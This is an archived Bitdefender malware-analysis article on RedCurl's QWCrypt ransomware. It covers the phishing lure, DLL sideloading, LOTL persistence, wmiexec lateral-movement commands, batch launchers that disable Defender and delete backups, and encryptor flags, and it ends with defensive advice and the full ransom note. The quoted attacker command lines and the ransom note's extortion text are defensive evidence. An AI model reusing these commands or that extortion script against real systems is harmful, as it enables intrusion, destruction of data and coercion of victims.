{
	"id": "f67bda93-1ead-4aa2-a317-8e1d734dd68a",
	"created_at": "2026-04-06T00:10:01.181053Z",
	"updated_at": "2026-04-10T13:12:17.262865Z",
	"deleted_at": null,
	"sha1_hash": "e83136e0de330e727cf98f00e40c410e2138a9b9",
	"title": "RedCurl's Ransomware Debut: A Technical Deep Dive",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 358928,
	"plain_text": "RedCurl's Ransomware Debut: A Technical Deep Dive\r\nBy Martin Zugec\r\nArchived: 2026-04-05 17:59:50 UTC\r\nThis research, conducted by Bitdefender Labs, presents the first documented analysis of a ransomware campaign\r\nattributed to the RedCurl group (also known as Earth Kapre or Red Wolf). RedCurl has historically maintained a\r\nlow profile, relying heavily on Living-off-the-Land (LOTL) techniques for corporate cyber espionage and data\r\nexfiltration. This shift to ransomware marks a significant evolution in their tactics.\r\nThis new ransomware, which we have named QWCrypt based on a self-reference 'qwc' found within the\r\nexecutable, is previously undocumented and distinct from known ransomware families.\r\nBy sharing our findings with the threat intelligence community and challenging existing assumptions, we hope to\r\nencourage further research of this unconventional threat actor that has been active since 2018.\r\nRedCurl: A (Red) Wolf in Sheep's Clothing?\r\nRedCurl's motivations raise more questions than answers. While frequently labeled a cyberespionage group, we\r\nfind the evidence supporting this classification inconclusive.\r\nMuch of the existing analysis from fellow security researchers reiterates the cyberespionage claim, primarily\r\nfocusing on technical aspects. While technical analysis is crucial, we believe it's equally important to examine\r\ntheir business model and the true motivations behind their actions for a complete operational picture.\r\nTraditionally, cyberespionage is the domain of state-sponsored actors, the APTs. Our telemetry has identified\r\nvictims primarily in the United States, but also in Germany, Spain, and Mexico. Other researchers however\r\nreported targets in Russia, a broad geographical scope atypical for state-sponsored groups.\r\nData exfiltration, a common tactic in ransomware operations, is typically employed for extortion. 
Yet, we have\r\nfound no historical evidence (until now) of RedCurl attempting to sell stolen data back to their victims, an unusual\r\ndeviation. Furthermore, financially motivated groups rarely prioritize the theft of proprietary information for\r\ncompetitive advantage; we struggle to identify a comparable group.\r\nThe group's revenue generation and operational objectives remain shrouded in mystery, particularly given their\r\nsustained activity since 2018. Consequently, their business model and true motivations remain unclear.\r\nHypothesis 1: Gun-For-Hire\r\nGiven the anomalies in RedCurl's behavior, we find it necessary to introduce a purely speculative hypothesis. It's\r\npossible that RedCurl operates as a 'gun-for-hire' group, essentially cyber mercenaries. This would explain their\r\ndiverse victimology and the lack of a clear, consistent operational pattern. Furthermore, this hypothesis could\r\npotentially explain their current interest in ransomware that targets infrastructure, rather than endpoint computers.\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 1 of 21\n\nIn a mercenary model, ransomware could serve as a diversion, masking the true objective: a targeted data\r\nexfiltration operation. It's also possible that RedCurl, having completed a data exfiltration contract, was not paid,\r\nleading them to use ransomware as an alternate way to monetize their access.\r\nHypothesis 2: Discreet Operations\r\nRedCurl's surprising introduction of hypervisor encryption, while maintaining network gateway functionality and\r\navoiding endpoint encryption, suggests a deliberate effort to limit the attack's impact to the IT department. 
This\r\nstrategy, if intentional, posits that RedCurl prioritizes discreet, direct negotiations with victims, minimizing public\r\nattention.\r\nThe absence of publicly visible ransom demands, such as through a dedicated leak site (DLS), does not\r\nnecessarily indicate that RedCurl is not directly approaching victims. It is plausible that they engage in private\r\nnegotiations, further reinforcing their preference for discreet operations and explaining their lack of public victim\r\nannouncements.\r\nSuch an approach enables extended, low-profile operations, ensuring consistent revenue across a broad client base\r\nand reducing their visibility to law enforcement. This hypothesis contrasts with the mercenary model, suggesting\r\nthat RedCurl avoids public disclosure as a core operational strategy since 2018.\r\nThis hypothesis is further supported by recent industry trends. Our 2023 Cybersecurity Assessment Report\r\nrevealed 42% of respondents reporting pressure to conceal security breaches. Alarmingly, our upcoming 2024\r\nreport indicates this trend has worsened, showing an increase in concealed breaches.\r\nInitial Access\r\nRedCurl has traditionally relied on social engineering and spear-phishing to gain initial access to targets. In its\r\nlatest ransomware deployment, the initial infection vector remains consistent with previous RedCurl campaigns:\r\nphishing emails containing IMG files disguised as CV documents.\r\nAn IMG file is essentially a sector-by-sector copy of a storage device, like a virtual disk. When a victim clicks on\r\nthe IMG file attached to the phishing email, Windows 10 and 11 have native support to automatically mount it as a\r\nvirtual drive. With default configuration, Windows will also automatically open the mounted disk, displaying its\r\ncontents in File Explorer. 
This is when the victim will see the file called 'CV APPLICANT 7802-91542.SCR'.\r\nNow, here's a little secret most folks don't know: screensaver ('.SCR') files are really just renamed executables.\r\nWhen you double-click a '.SCR' file, Windows treats it like an executable, but with an additional '/S' parameter,\r\ntelling it to run in the fullscreen mode. And here's the fun part: this works both ways. You can absolutely rename a\r\n'.SCR' file to '.EXE' and run it (though you'd need to include the '/S' parameter). But, just as easily, you can\r\nrename any '.EXE' file to '.SCR', and Windows will happily execute it. It'll just add that '/S' parameter, which\r\nwon't do anything unless the executable is designed for it.\r\nScreensaver (.SCR) files are just renamed executables\r\nCV APPLICANT 7802-91542.SCR is just a renamed copy of a legitimate Adobe executable,\r\nADNotificationManager.exe, and this Adobe executable is vulnerable to DLL sideloading.\r\nWhen an application starts, it often loads libraries (DLLs) to perform various functions. If an attacker can place a\r\nmalicious DLL with the same name as a legitimate one in the same folder as the application, the application will\r\nload the malicious one instead (read our tech explainer for more details about this technique).\r\nDLL sideloading and order execution hijacking\r\nThat's exactly what's happening here. When the victim clicks on that '.SCR' file (which, remember, is just a\r\nrenamed '.EXE'), Windows executes it.\r\n
And because of that DLL sideloading vulnerability, it automatically loads a\r\nlibrary containing malicious code named netutils.dll from the same folder.\r\nAfter execution, the netutils.dll immediately launches a ShellExecuteA call with the open verb, directing the\r\nvictim's browser to https://secure.indeed.com/auth. This displays a legitimate Indeed login page, a calculated\r\ndistraction designed to mislead the victim into thinking they are simply opening a CV. This social engineering\r\ntactic provides a window for the malware to operate undetected.\r\nSimultaneously, netutils.dll acts as a downloader. Preliminary analysis of the netutils.dll downloader revealed\r\nother recurring characteristics observed in prior RedCurl campaigns, including the implementation of encrypted\r\nstrings decrypted via bcrypt.dll. It uses wininet.dll functions to retrieve the final payload from the domain\r\nfall[.]dropconnect[.]workers[.]dev, using a custom user agent: 'Mozilla/5.0 (Windows NT; Windows NT 10.0;)\r\nWindowsPowerShell/5.1.20134.790 (tQZyWLKnigaURyRIrnRG)'.\r\nThis final payload is stored in %APPDATA%\\BrowserSpec\\BrowserSpec_\u003cbase64 representation of the\r\nhostname\u003e.dll. To establish persistence, a scheduled task named \\BrowserSpec\\BrowserSpec_\u003cbase64\r\nrepresentation of the hostname\u003e is created. This scheduled task executes the final payload indirectly with the\r\nfollowing commandline: C:\\Windows\\system32\\pcalua.exe -a rundll32 -c shell32.dll,Control_RunDLL C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\BrowserSpec\\BrowserSpec_.\u003cbase64 representation of the hostname\u003e.dll hard-wired-displacement\r\nThis command line is a classic example of Living Off The Land (LOTL) techniques, a common tactic in modern\r\ncyberattacks (and remember, we've got a Tech Explainer on LOTL if you want to dive deeper.) 
Basically, it's about\r\nusing legitimate system tools to carry out malicious actions, making it harder for defenders to spot the bad stuff.\r\nC:\\Windows\\system32\\pcalua.exe: Our first LOTL component is pcalua.exe, the Program Compatibility Assistant\r\n(PCA) utility. It's designed to help older programs run on newer versions of Windows, think of it as a\r\ncompatibility wrapper. It can be abused for proxy execution of binaries.\r\n-a rundll32: This tells pcalua.exe to launch rundll32.exe, another LOTL utility. Rundll32.exe is a Windows\r\nutility used to run DLLs (Dynamic Link Libraries). It's a legitimate tool, but it can be abused to run\r\nmalicious DLLs.\r\n-c shell32.dll,Control_RunDLL C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\BrowserSpec\\BrowserSpec_\u003cbase64\r\nrepresentation of the hostname\u003e.dll: This specifies the DLL (shell32.dll) and the function within that DLL\r\n(Control_RunDLL) that rundll32.exe should call.\r\nThe -c switch, when used with pcalua.exe in this context, effectively designates everything that\r\nfollows it as the command-line parameters that are passed to the executable being launched\r\n(rundll32.exe).\r\nControl_RunDLL is a function within shell32.dll (another LOTL component) that's designed to\r\nlaunch control panel applets. However, it can be abused to execute binaries.\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\BrowserSpec\\BrowserSpec_\u003cbase64 representation of the\r\nhostname\u003e.dll This is the only malicious component in this command line. This is RedCurl's custom\r\nDLL, the payload they want to execute.\r\n
The base64 encoding of the hostname is used to make the\r\nname unique to each compromised host.\r\nhard-wired-displacement This is the name of the DLL function to call from the malicious library.\r\nThis backdoor, a straightforward but reliable tool, acts as their main entry point. Other security researchers have\r\npreviously documented it under names like RedCurl.Downloader or Earth Kapre downloader. Since our research\r\nis focused on the first documented instance of ransomware in RedCurl operations, we won't rehash the well-known behaviors of this malware that have already been covered.\r\nLateral Movement\r\nOnce RedCurl establishes their initial foothold, their focus shifts to navigating the network, gathering intelligence,\r\nand escalating their access.\r\nWith access to compromised user accounts across multiple systems, RedCurl used WMI to run commands on\r\nother computers. When they run commands remotely, they stick to built-in Windows tools. They don’t bring in\r\nany external tools; they rely only on LOTL techniques and regular Windows tools like powershell.exe,\r\nwmic.exe, certutil.exe, or tasklist.exe.\r\nAnalysis revealed the use of a pentesting tool whose techniques mirror those found in both the older,\r\ndeprecated wmiexec-RegOut and the current wmiexec-Pro projects. This modified wmiexec is interesting because\r\nit only requires port 135 to function, bypassing the need for an SMB connection, which is often monitored by\r\nsecurity tools.\r\n
This tool outputs command results into files in C:\\Windows\\Temp\\\u003c6 random letters\u003e or directly\r\ninto the Windows Registry.\r\nA sample of these commands can be found below:\r\ncmd.exe /Q /c powershell -c \"Enable-PSRemoting -force\" 1\u003e \\\\Windows\\\\Temp\\\\VSoNLA 2\u003e\u00261\r\ncmd.exe /Q /c tasklist | find /I \"outlook\" 1\u003e \\\\Windows\\\\Temp\\\\pgkVdT 2\u003e\u00261\r\ncmd.exe /Q /c echo wmic process get Name,Commandline ^\u003e\r\n\\\\\\\\N_b18353ea8eea835eb48cf281b2f632c6\\\\C$\\\\UGxqYI 2^\u003e^\u00261 \u003e C:\\\\Windows\\\\TEMP\\\\ABFHtO.bat \u0026\r\nC:\\\\Windows\\\\system32\\\\cmd.exe /Q /c C:\\\\Windows\\\\TEMP\\\\ABFHtO.bat \u0026 C:\\\\Windows\\\\system32\\\\cmd.exe\r\n/Q /c del C:\\\\Windows\\\\TEMP\\\\ABFHtO.bat\r\ncmd.exe /Q /c dir C:\\\\users 1\u003e C:\\\\windows\\\\temp\\\\f952d983-1bd1-4342-a761-57e1fd6eb554.txt 2\u003e\u00261 \u0026\u0026\r\ncertutil -encodehex -f C:\\\\windows\\\\temp\\\\f952d983-1bd1-4342-a761-57e1fd6eb554.txt\r\nC:\\\\windows\\\\temp\\\\a793c84d-5993-4dcb-bc19-ff838eb70137.txt 0x40000001 \u0026\u0026 for /F \"usebackq\" %G in\r\n(\"C:\\\\windows\\\\temp\\\\a793c84d-5993-4dcb-bc19-ff838eb70137.txt\") do reg add\r\nHKLM\\\\Software\\\\Classes\\\\evOFVQ /v ac77f6d6-74ce-4110-95e0-4ec2408968f2 /t REG_SZ /d \"%G\" /f \u0026\u0026 del\r\n/q /f /s C:\\\\windows\\\\temp\\\\f952d983-1bd1-4342-a761-57e1fd6eb554.txt C:\\\\windows\\\\temp\\\\a793c84d-5993-4dcb-bc19-ff838eb70137.txt\r\nWe also observed the use of Chisel, a fast TCP/UDP tunnel over HTTP. We suspect it was used for RDP access.\r\nWe've seen RedCurl stick to their usual playbook in most cases, continuing with data exfiltration over longer\r\nperiods of time. However, one case stood out.\r\n
They broke their routine and deployed ransomware for the first\r\ntime.\r\nRansomware Deployment\r\nThe ransomware incident we observed with RedCurl stands out. Beyond the questions surrounding their\r\nmotivation, their targeting strategy is also noteworthy. While most ransomware groups deploy their payloads\r\nacross all endpoints (often using GPO or PsExec), and some extend to hypervisors, RedCurl targeted only\r\nhypervisors.\r\nThis focused targeting can be interpreted as an attempt to inflict maximum damage with minimum effort. By\r\nencrypting the virtual machines hosted on the hypervisors, making them unbootable, RedCurl effectively disables\r\nthe entire virtualized infrastructure, impacting all hosted services. Interestingly, they deliberately excluded specific\r\nVMs that acted as network gateways, demonstrating their familiarity with the network implementation. The batch\r\nscripts used to launch the attack contained hardcoded information about the environment, including machine\r\nnames, further indicating a highly targeted operation.\r\nBy keeping network gateways operational and avoiding endpoint encryption, RedCurl may have aimed to confine\r\nthe attack to the IT team, preventing widespread disruption and user awareness.\r\nLauncher Script\r\nThe ransomware, named rbcw.exe, was deployed from an encrypted 7z archive. The archive was extracted to the\r\nC:\\ProgramData directory using the 7-Zip executable (7za.exe) with the command C:\\ProgramData\\7za.exe x -aoa -p BSoQ7N0H5...... C:\\ProgramData\\a753506f51fc.tmp.\r\nExecution was initiated through custom-crafted batch files, specifically tailored to the victim's environment. The\r\ninitial batch file, a753506f51fc.bat, was executed by the command cmd.exe /c C:\\ProgramData\\a753506f51fc.bat --pass BSoQ7N0H5...... --main a753506f51fc --key \u003ckey\u003e --timeout -7793.\r\n
The primary function of the\r\na753506f51fc.bat batch file is to disable Windows Defender before initiating the next script in the sequence.\r\nWhile we cannot definitively confirm the existence of separate scripts tailored for other endpoint security\r\nsolutions, our investigation revealed multiple indications of RedCurl attempting to bypass a variety of security\r\nproducts. The batch file has multiple references to the executable Term.exe. This executable is linked to a PDB file\r\nnamed \"Terminator_v1.1,\" potentially associated with a known 'bring your own vulnerable driver' (BYOVD)\r\ndriver. BYOVD leverages legitimate, but vulnerable, drivers to elevate privileges and disable security software.\r\nFurthermore, the ransomware configuration file contains explicit exclusions for several endpoint security\r\nsolutions, including Windows Defender, Malwarebytes, VIPRE Business Agent, Bitdefender, and SentinelOne.\r\nMain Script\r\nFollowing the initial stage of disabling endpoint security, the a753506f51fc.bat script proceeds to execute the\r\nscript responsible for launching the ransomware encryption process (rnm.bat or rn.bat) using the command line cmd.exe\r\n/c C:\\\\ProgramData\\\\rnm.bat --pass BSoQ7N0H5...... --main a753506f51fc --key \u003ckey\u003e.\r\nThe scripts begin by parsing command-line arguments to retrieve critical parameters: the decryption password\r\n(tpass), the main executable name (tmain), and the encryption key (tkey).\r\nThe scripts then configure variables for remote logging and data exfiltration. The davstr variable defines the\r\nWebDAV URL for remote file storage, and the slog and spass variables store the credentials for accessing this\r\nremote location. Notably, an attempt to upload files using PowerShell is present but commented out, replaced with\r\ncurl.exe for data transfer.\r\n
This suggests the attackers may have encountered issues with PowerShell execution or\r\npreferred the reliability of curl.\r\nA key aspect of these scripts is their customization for specific victims. The script includes conditional blocks that\r\nperform targeted backup deletion based on the hostname. For example, on one Hyper-V host, the script removes\r\nspecific backup directories and virtual hard disk files.\r\nBefore initiating the encryption, the script performs several system reconnaissance and cleanup tasks. It stops and\r\ndeletes the Term service, which is associated with the term.exe process, likely used for disabling endpoint security.\r\nThe script then captures system information, including running processes and logical disk details, and logs it to\r\nfiles within a temporary directory (%ALLUSERSPROFILE%\\temp_3a3352baf).\r\nThe core encryption routine is then executed. The ransomware encryptor, rbcw.exe, is executed twice for virtual\r\nmachines (--hv switch), and twice for the host itself, four times in total.\r\nThe commands used were:\r\nrbcw.exe --hv --excludeVM \"wingate\u003csubnet1\u003e,wingate,wingate\u003csubnet2\u003e\" --key %tkey% --nosd\r\n\u003e%tdir%\\%computername%_rbcw_hv_1.log 2\u003e\u00261\r\nrbcw.exe --hv --excludeVM \"wingate\u003csubnet1\u003e,wingate,wingate\u003csubnet2\u003e\" --key %tkey% --nosd\r\n\u003e%tdir%\\%computername%_rbcw_hv_2.log 2\u003e\u00261\r\nrbcw.exe --key %tkey% --nosd \u003e%tdir%\\%computername%_rbcw_1.log 2\u003e\u00261\r\nrbcw.exe --key %tkey% \u003e%tdir%\\%computername%_rbcw_2.log 2\u003e\u00261\r\nLet’s break down these commands:\r\nrbcw.exe: This is the ransomware executable itself.\r\n--hv: This flag indicates that the ransomware should target Hyper-V virtual machines.\r\n--excludeVM \"wingate\u003csubnet1\u003e,wingate,wingate\u003csubnet2\u003e\": This option specifies a comma-separated\r\nlist of virtual machines to exclude from encryption, in this case, the network gateways.\r\n--key %tkey%:\r\n
This argument provides the encryption key, which is dynamically passed from the\r\npreceding batch file.\r\n--nosd: This flag instructs the ransomware not to self-delete after encryption.\r\n\u003e%tdir%\\%computername%_rbcw_*.log 2\u003e\u00261: These parts redirect the ransomware's output and error\r\nmessages to log files within the temporary directory.\r\nThis double execution, combined with the two separate log files, indicates a deliberate attempt to ensure complete\r\nencryption or to gather debug information for further development. Files are not encrypted twice, because the encryptor\r\nchecks for the .randombits extension; the double execution likely aims to catch any files missed during the initial\r\npass.\r\nNotice the lack of the --nosd flag on the very last command, instructing the ransomware encryptor to self-delete\r\nafter execution.\r\nFinally, the script cleans up after itself by deleting the ransomware executable, supporting tools, and temporary\r\nfiles. This thorough cleanup aims to minimize the attackers' footprint and complicate forensic analysis. The batch\r\nfiles exhibit a high degree of polish and customization, further indicating a sophisticated threat actor with a deep\r\nunderstanding of the victim's environment.\r\nRansomware Encryptor Analysis\r\nThe ransomware binary, rbcw.exe, is a UPX-packed Go executable. Notably, this ransomware strain is novel; our\r\nanalysis did not reveal any similar samples or known ransomware families. After unpacking, the binary is\r\nobfuscated, but the command-line options --help and /h provide a clear overview of the ransomware's features.\r\n-k, --key string\r\nThis argument provides the encryption key, which is essential for the ransomware to function.\r\nWithout this key, the ransomware will not encrypt any files.\r\n
This key is used to generate the\r\nXChaCha20-Poly1305 key used to decrypt the configuration data, which includes the ransom note.\r\n--folder stringArray\r\nThis switch defines the folders to search for files to encrypt. The default value is \"all,\" indicating\r\nthat the ransomware will search all accessible folders.\r\n--nosd\r\nThis flag instructs the ransomware not to self-delete after encryption. Without this flag, the\r\nransomware will delete itself after completing its operations.\r\n--noshadowdelete\r\nThis switch stops the ransomware from deleting shadow copies.\r\n--hv\r\nThis flag enables Hyper-V VM encryption. When present, the ransomware will encrypt virtual\r\nmachines running on the current host.\r\n--excludeVM string\r\nThis option specifies a comma-separated list of virtual machines (VMs) to exclude from encryption.\r\n--kill\r\nThis switch is used to kill VM processes.\r\n--full-enc-less string\r\nThis option specifies the maximum file size for full encryption. Files smaller than this size will be\r\nfully encrypted, while larger files may be partially encrypted. The default value is \"50M,\" indicating\r\n50 megabytes.\r\n--skip-count int\r\nThis switch allows the ransomware to skip a certain number of blocks during encryption. The\r\ndefault is 5.\r\nInstead of encrypting every consecutive block of data within a file, the ransomware skips a defined\r\nnumber of blocks, leaving portions of the original file unencrypted. By using partial encryption,\r\nransomware can significantly speed up the encryption process and also evade some\r\ndetection mechanisms.\r\n--minsize string\r\nThis switch is used to set the minimum file size to encrypt.\r\n--maxsize string\r\nThis switch is used to set the maximum file size to encrypt.\r\n--block-size string\r\nThis switch defines the AES block size used during encryption.\r\n
The default value is \"1M,\"\r\nindicating a 1 megabyte block size. This parameter allows the attackers to adjust the performance of\r\nthe encryption process.\r\n--chacha\r\nThis flag enables the use of the ChaCha20 algorithm for encryption. If this switch is not present, the\r\nransomware defaults to AES encryption.\r\n--dryrun\r\nThis switch enables a \"dry run\" mode, where the ransomware simulates the encryption process\r\nwithout actually modifying any files.\r\n-h, --help\r\nThis switch displays the help information, listing all available command-line options and their\r\ndescriptions.\r\n-i, --info\r\nThis switch prints system information to the console or log file. This is likely used for\r\nreconnaissance purposes, providing the attackers with details about the compromised system.\r\n--log string\r\nThis option specifies the path to the log file, where the ransomware will record its activities.\r\n--threads int\r\nThis option specifies the number of threads to use during encryption. The default value is 10. This\r\nparameter allows the attackers to adjust the performance of the encryption process.\r\n--turnoff\r\nThis switch turns off Hyper-V VMs. The default is true.\r\n-v, --verbose\r\nThis flag enables verbose output mode, providing more detailed information about the ransomware's\r\nactivities.\r\nThe --key command-line switch is critical for the rbcw.exe functionality, because it also decrypts the ransomware's\r\nconfiguration file. This configuration includes the ransom note. This dependency on the key also presents\r\nchallenges for analysis, as without knowing it, researchers cannot directly access the configuration.\r\nAn interesting detail is the presence of a hardcoded personal ID within the ransom note. This ID is not arbitrary;\r\nit's likely the key to a unique RSA key pair, with the corresponding public key embedded within the ransomware's\r\nconfiguration. 
This implies that the attackers maintain a matching private key, required for decrypting the victim's\r\nfiles. Therefore, the personal ID acts as a unique identifier, directly connecting the victim to their specific\r\ndecryption key.\r\nRansomware Note Analysis\r\nAnalysis of the ransom note reveals that it is not an original creation. Instead, it is composed of sections taken\r\nfrom the ransom notes of other known ransomware groups, including LockBit, HardBit, and Mimic group. This\r\npractice of repurposing existing ransom note text raises questions about the origins and motivations of the\r\nRedCurl group. Notably, there is no known dedicated leak site (DLS) associated with this ransomware, and it\r\nremains unclear whether the ransom note represents a genuine extortion attempt or a diversion.\r\nConclusion and Recommendations\r\nThe RedCurl group's recent deployment of ransomware marks a significant evolution in their tactics. This\r\ndeparture from their established modus operandi raises critical questions about their motivations and operational\r\nobjectives.\r\n
The highly targeted nature of the ransomware attack shows a well-planned and executed operation.\r\nTo mitigate the risk of ransomware attacks similar to the one deployed by RedCurl, and aligning with the insights\r\nprovided in Bitdefender's Ransomware Whitepaper, we recommend the following:\r\n1. Multilayered Defense: Adopting a multilayered security approach is essential. Organizations should invest in a\r\ndiverse range of security controls, including network segmentation and endpoint protection, to create overlapping\r\nlayers of defense against cyber threats.\r\n2. Detection and Response: Despite your best efforts, it is still possible that modern threat actors will make it past\r\nyour prevention and protection controls. This is where your detection and response capabilities come into play.\r\nWhether you get these capabilities as-a-product (EDR/XDR) or as-a-service (MDR), the purpose is to minimize\r\nthe time that threat actors remain undetected. The Bitdefender MDR team conducts a proactive search through an\r\nenvironment to hunt malicious, suspicious, or risky activities that have evaded detection by existing tools. Use\r\nbehavioral analysis and anomaly detection to identify suspicious activities, such as unusual tunneling via tools like\r\nchisel or remote execution with wmiexec-RegOut.\r\n3. Prioritize Living-off-the-Land (LOTL) Prevention: Almost all modern cybercriminals abuse legitimate system\r\ntools for malicious purposes, so focus on preventing and detecting LOTL attacks. Implement strict application\r\ncontrol to limit the execution of unauthorized scripts and binaries, even those signed by trusted vendors.\r\n
Harden\r\nPowerShell and other scripting environments by enforcing execution policies and enabling enhanced logging.\r\nMonitor for unusual process executions and command-line arguments, as RedCurl leverages tools like curl.exe\r\nand wmic.exe for malicious activities. Additionally, restrict administrative privileges and implement least-privilege principles to limit the impact of compromised accounts.\r\n4. Enhance Data Protection and Resilience: While backups are often considered a core defense against\r\nransomware, they are usually less effective than assumed due to malicious targeting. Implement immutable\r\nbackups, isolated from the production network, and regularly test recovery procedures. Exercise caution with\r\nbackup solutions that rely on Shadow Volume Copies, as these are frequently targeted and deleted by ransomware,\r\nas evidenced by RedCurl's default deletion of shadow volumes. Encrypt sensitive data at rest and in transit to\r\nminimize data breach impacts.\r\n5. Advanced Threat Intelligence: The right threat intelligence solutions can provide critical insights about\r\nattacks. Bitdefender IntelliZone consolidates all the information we've gathered about RedCurl operations. If you\r\nalready have an IntelliZone account, you can find additional structured information under Threat ID BD9ys7c9na.\r\nBy implementing these recommendations, organizations can strengthen their defenses and better protect against\r\nthe evolving threat landscape posed by sophisticated cyber adversaries.\r\nWe would like to thank Stefan Ioja, Adrian Schipor, Victor Vrabie, and Bogdan Zavadovschi for help with putting\r\nthis advisory report together.
\r\nAppendices\r\nRansom Note\r\nPERSONAL_ID: 329BCF07-85F2-49A7-97C3-5D7DA04FB9E3\r\n\u003e\u003e\u003e\u003e\u003e Your data is stolen and encrypted.\r\nIf you don't pay the ransom, the data will be published on our TOR darknet sites.\r\n
Keep in mind that once your data\r\nappears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time.\r\nThe sooner you pay the ransom, the sooner your company will be safe.\r\n\u003e\u003e\u003e\u003e\u003e What are the dangers of leaking your company's data.\r\nFirst of all, you will receive fines from the government such as the GDRP and many others, you can be sued by\r\ncustomers of your firm for leaking information that was confidential. Your leaked data will be used by all the\r\nhackers on the planet for various unpleasant things. For example, social engineering, your employees' personal\r\ndata can be used to re-infiltrate your company. Bank details and passports can be used to create bank accounts and\r\nonline wallets through which criminal money will be laundered. On another vacation trip, you will have to explain\r\nto the FBI where you got millions of dollars worth of stolen cryptocurrency transferred through your accounts on\r\ncryptocurrency exchanges. Your personal information could be used to make loans or buy appliances. You would\r\nlater have to prove in court that it wasn't you who took out the loan and pay off someone else's loan. Your\r\ncompetitors may use the stolen information to steal technology or to improve their processes, your working\r\nmethods, suppliers, investors, sponsors, employees, it will all be in the public domain. You won't be happy if your\r\ncompetitors lure your employees to other firms offering better wages, will you? Your competitors will use your\r\ninformation against you. For example, look for tax violations in the financial documents or any other violations,\r\nso you have to close your firm. According to statistics, two thirds of small and medium-sized companies close\r\nwithin half a year after a data breach. 
You will have to find and fix the vulnerabilities in your network, work with\r\nthe customers affected by data leaks. All of these are very costly procedures that can exceed the cost of a\r\nransomware buyout by a factor of hundreds. It's much easier, cheaper and faster to pay us the ransom. Well and\r\nmost importantly, you will suffer a reputational loss, you have been building your company for many years, and\r\nnow your reputation will be destroyed.\r\n\u003e\u003e\u003e\u003e\u003e How to decrypt data?\r\nContact our Support Team by email: edgypsin@proton.me (insert your PERSONAL_ID at SUBJECT field) and\r\nwait for an answer, we'll guarantee a response. Sometimes you will have to wait some time for our reply, this is\r\nbecause we have a lot of work and we attack hundreds of companies around the world.\r\n\u003e\u003e\u003e\u003e\u003e What guarantee is there that we won't cheat you?\r\nWe are one of the most famous ransomware group, nothing is more important than our reputation. We are not a\r\npolitically motivated group and we want nothing more than money. If you pay, we will provide you with\r\ndecryption software. After you pay the ransom, you will quickly make even more money. Look at this situation\r\nsimply as a paid training for your system administrators, because it is due to your corporate network not being\r\nproperly configured that we were able to attack you. Our pentest services should be paid just like you pay the\r\nsalaries of your system administrators. Get over it and pay for it.\r\n\u003e\u003e\u003e\u003e\u003e Warning! Do not delete or modify encrypted files, it will lead to problems with decryption of files!\r\n\u003e\u003e\u003e\u003e Very important! For those who have cyber insurance against ransomware attacks.\r\nInsurance companies require you to keep your insurance information secret, this is to never pay the maximum\r\namount specified in the contract or to pay nothing at all, disrupting negotiations. 
The insurance company will try\r\nto derail negotiations in any way they can so that they can later argue that you will be denied coverage because\r\nyour insurance does not cover the ransom amount. For example your company is insured for 10 million dollars,\r\nwhile negotiating with your insurance agent about the ransom he will offer us the lowest possible amount, for\r\nexample 100 thousand dollars, we will refuse the paltry amount and ask for example the amount of 15 million\r\ndollars, the insurance agent will never offer us the top threshold of your insurance of 10 million dollars. He will do\r\nanything to derail negotiations and refuse to pay us out completely and leave you alone with your problem. If you\r\ntold us anonymously that your company was insured for $10 million and other important details regarding\r\ninsurance coverage, we would not demand more than $10 million in correspondence with the insurance agent.\r\nThat way you would have avoided a leak and decrypted your information. But since the sneaky insurance agent\r\npurposely negotiates so as not to pay for the insurance claim, only the insurance company wins in this situation.\r\nTo avoid all this and get the money on the insurance, be sure to inform us anonymously about the availability and\r\nterms of insurance coverage, it benefits both you and us, but it does not benefit the insurance company. 
Poor\r\nmultimillionaire insurers will not starve and will not become poorer from the payment of the maximum amount\r\nspecified in the contract, because everyone knows that the contract is more expensive than money, so let them\r\nfulfill the conditions prescribed in your insurance contract, thanks to our interaction.\r\n\u003e\u003e\u003e\u003e\u003e If you do not pay the ransom, we will attack your company again in the future.\r\nrbcw.exe Arguments\r\nThis is a longer description that spans multiple lines and likely contains examples and usage of using your\r\napplication.\r\nFor example:\r\nCobra is a CLI library for Go that empowers applications. This application is a tool to generate the needed files to\r\nquickly create a Cobra application.\r\nUsage:\r\nqwc [flags]\r\nFlags:\r\n     --block-size string     AES Block size (default \"1M\")\r\n     --chacha                 Use ChaCha20 algorithm\r\n     --dryrun                 Do not modify anything\r\n     --excludeVM string       Exclude VMs (csv list)\r\n     --folder stringArray     Folders to serch files (default [all])\r\n     --full-enc-less string   Full encrypt files less than (default \"50M\")\r\n-h, --help                   help for qwc\r\n     --hv                     Encrypt HyperV VMs\r\n-i, --info                   Print system info\r\n-k, --key string             Vars key\r\n     --kill                   Kill VM process\r\n     --log string             Log file\r\n     --maxsize string         Vars key (default \"0\")\r\n     --minsize string         Vars key (default \"0\")\r\n     --nosd                   Do not self delete\r\n     --noshadowdelete         Do not delete shadow copies\r\n     --skip-count int         Skip blocks count (default 5)\r\n     --threads int           Cryptor thread count (default 10)\r\n     --turnoff               TurnOff HyperV VMs (default 
true)\r\nThere can also be a longer description that spans multiple lines and likely contains examples and usage of using\r\nyour application.\r\nFor example:\r\nCobra is a CLI library for Go that empowers applications.\r\nThis application is a tool to generate the needed files\r\nto quickly create a Cobra application.\r\nUsage:\r\nqwc [flags]\r\nFlags:\r\n     --block-size string     AES Block size (default \"1M\")\r\n     --chacha                 Use ChaCha20 algorithm\r\n     --dryrun                 Do not modify anything\r\n     --excludeVM string       Exclude VMs (csv list)\r\n     --folder stringArray     Folders to serch files (default [all])\r\n     --full-enc-less string   Full encrypt files less than (default \"50M\")\r\n-h, --help                   help for qwc\r\n     --hv                     Encrypt HyperV VMs\r\n-i, --info                   Print system info\r\n-k, --key string             Vars key\r\n     --kill                   Kill VM process\r\n     --log string             Log file\r\n     --maxsize string         Vars key (default \"0\")\r\n     --minsize string         Vars key (default \"0\")\r\n     --nosd                   Do not self delete\r\n     --noshadowdelete         Do not delete shadow copies\r\n     --skip-count int         Skip blocks count (default 5)\r\n     --threads int           Cryptor thread count (default 10)\r\n     --turnoff               TurnOff HyperV VMs (default true)\r\n     --verbose             Use verbose output format\r\nExclusion Rules\r\nThe config also contains exceptions for directories and 